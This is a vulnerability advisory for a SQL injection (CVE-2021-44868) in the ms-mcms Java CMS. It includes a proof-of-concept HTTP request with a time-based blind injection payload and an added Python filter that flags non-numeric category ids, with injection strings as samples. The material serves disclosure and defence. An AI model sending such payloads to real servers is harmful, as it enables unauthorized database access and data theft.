SQL Injection Affecting net.mingsoft:ms-mcms package, versions [0,]
Threat Intelligence
- Exploit Maturity: Proof of concept
- EPSS: 0.2% (59th percentile)
- Snyk ID SNYK-JAVA-NETMINGSOFT-2404812
- published 18 Feb 2022
- disclosed 18 Feb 2022
- credit chauncyman
Introduced: 18 Feb 2022
CVE-2021-44868
How to fix?
There is no fixed version for net.mingsoft:ms-mcms.
Overview
Affected versions of this package are vulnerable to SQL Injection due to improper input sanitization of the categoryId parameter in ContentBizImpl.java.
PoC:
POST /ms/cms/content/list.do HTTP/1.1
Host: cms.demo.mingsoft.net
Content-Length: 21
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://cms.demo.mingsoft.net
Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ****
Connection: close

contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'
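
Because no fixed version exists, one compensating control is to flag or reject requests to this endpoint whose category id is not a bare integer. The check below is an added example, not code from the advisory or from the ms-mcms project; it assumes category ids are decimal integers (as the 158 in the PoC suggests), and the function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumptions (not stated by the advisory): category ids are plain decimal
# integers, and both parameter spellings that appear on the page are checked.
ENDPOINT = "/ms/cms/content/list.do"
PARAMS = {"contentCategoryId", "categoryId"}
NUMERIC_ID = re.compile(r"[0-9]{1,19}")


def suspicious_params(method, path, body):
    """Return (name, decoded value) pairs whose value is not a bare numeric id."""
    if method.upper() != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return []
    # parse_qsl percent-decodes values, so an encoded quote is judged the same
    # way as a literal one; keep_blank_values keeps empty ids visible.
    pairs = parse_qsl(body, keep_blank_values=True)
    return [(k, v) for k, v in pairs
            if k in PARAMS and v and not NUMERIC_ID.fullmatch(v)]


# Constructed sample traffic as (method, path, form body); not captured data.
# "other" is a filler parameter name, not one taken from the application.
SAMPLES = [
    ("POST", ENDPOINT, "contentCategoryId=158&other=1"),
    ("POST", ENDPOINT, "contentCategoryId=&other=1"),
    ("POST", ENDPOINT, "contentCategoryId=158'||(SELECT(SLEEP(5)))||'"),
    ("POST", ENDPOINT,
     "contentCategoryId=158%27%7C%7C%28SELECT%28SLEEP%285%29%29%29%7C%7C%27"),
    ("POST", "/ms/cms/category/list.do", "categoryId=abc"),
]


def scan(samples):
    """Return (index, findings) for every sample request that should be flagged."""
    flagged = []
    for i, (method, path, body) in enumerate(samples):
        hits = suspicious_params(method, path, body)
        if hits:
            flagged.append((i, hits))
    return flagged


if __name__ == "__main__":
    for index, hits in scan(SAMPLES):
        print(f"sample {index}: non-numeric category id {hits}")
```

The same allow-list test can run in a reverse proxy or servlet filter in front of the application; it narrows exposure through this one parameter and does not replace a parameterized query in the code itself.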